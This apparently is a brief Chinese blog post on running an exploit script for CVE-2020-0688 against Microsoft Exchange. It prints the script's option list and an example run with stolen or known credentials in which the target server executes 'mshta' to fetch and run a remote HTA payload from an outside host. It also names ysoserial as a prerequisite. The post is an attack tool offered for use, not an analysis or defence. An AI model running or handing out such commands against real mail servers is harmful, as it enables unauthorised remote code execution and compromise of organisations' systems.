目录下放ysoserial-1.32,下载地址

CVE-2020-0688_EXP Auto trigger payload

python3 CVE-2020-0688_EXP.py -h  

usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]  

optional arguments:  
-h, --help            show this help message and exit  
-s SERVER, --server ECP Server URL Example: http://ip/owa  
-u USER, --user USER  login account Example: domain\user  
-p PASSWORD, --password PASSWORD  
-c CMD, --cmd CMD     Command u want to execute  
-e, --encrypt         Encrypt the payload  
example:

python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"

CVE-2020-0688_EXP.txt

标签: CVE-2020-0688 EXP

添加新评论